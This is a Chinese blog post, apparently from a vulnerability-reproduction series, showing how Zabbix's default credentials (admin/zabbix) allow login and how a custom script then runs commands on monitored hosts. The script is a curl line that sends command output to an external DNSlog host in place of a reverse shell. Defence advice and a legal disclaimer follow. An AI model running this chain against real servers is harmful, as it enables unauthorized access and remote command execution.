漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

admin 2023年6月21日11:17:28评论263 views字数 1425阅读4分45秒阅读模式

---------------------------------------------------------------

本文题干阅读时间推荐5min,练习推荐1h

----------------------------------------------------------------

 如果各位童鞋想讨论以下相关内容,欢迎关注公众号, 联系我:

  • OSCP相关技术备考中

  • CISSP备考经验已通过认证

  • CCSK(云安全)已通过认证

  • ISO/IEC 27001 Foundation已通过认证

----------------------------------------------------------------

一、前言

1. zabbix介绍

Zabbix是一个开源的网络监控和告警系统,可以实时监控各种网络设备、服务器和应用程序的性能和可用性。它提供了广泛的监控功能,包括对系统资源的监控,如CPU、内存、磁盘空间、网络带宽等,以及对各种服务和应用程序的监控,如Web服务器、数据库、邮件服务器、DNS、FTP等。

二、漏洞成因

  • Zabbix由于默认安装的账号和密码是固定不变的,导致安装后的系统容易受到弱口令攻击。攻击者可以使用默认的用户名和密码直接登录到Zabbix系统,并利用此漏洞进一步实施攻击。

  • 一旦攻击者成功登录到Zabbix系统,他们可以利用Zabbix的监控功能执行系统命令。攻击者可以使用“自定义键值”功能创建一个自定义监控项,然后在监控项的参数中输入恶意命令,从而实现命令执行。这样的攻击方式被称为“命令执行Getshell”。

  • 攻击者还可以通过Zabbix的Web界面上传恶意文件并执行,从而获取系统权限,或者通过Zabbix的API接口执行恶意代码。

三、防御方法

  • 为了防止Zabbix弱口令和命令执行攻击,管理员应该及时更新Zabbix的默认账号密码,并定期更改系统密码。

  • 此外,管理员还应该限制Zabbix系统的访问权限,只允许受信任的IP地址或网络访问Zabbix系统,以减少攻击面。

  • 另外,管理员还应该监控Zabbix系统的日志,及时发现异常行为,以便及时采取措施。

、漏洞挖掘

1、获取目标平台及url

漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

2、通过外围打点,弱口令大法好,使用默认口令(admin/zabbix)成功进入

漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

3、写入shell脚本

在管理-脚本-创建脚本写入反弹shell命令(本次用dnslog替代实验):

http://x.x.x.x/zabbix/zabbix.php?action=script.edit&scriptid=4

curl  'whoami'.whoami.q7yzw2.dnslog.cn

漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

4、执行shell脚本

4-1:(监控-最新数据)http://x.x.x.x/zabbix/latest.php?ddreset=1,

漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

4-2:点击Host groupsselect,全选,本地监听端口然后选择脚本执行

漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

-----------------------------------------------

本期漏洞复现就结束啦,下期见!

--------------------------------------------------

注意:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!~


原文始发于微信公众号(从放弃到入门):漏洞复现系列-Zabbix-弱口令再到命令执行Getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月21日11:17:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现系列-Zabbix-弱口令再到命令执行Getshellhttp://cn-sec.com/archives/1820555.html

发表评论

匿名网友 填写信息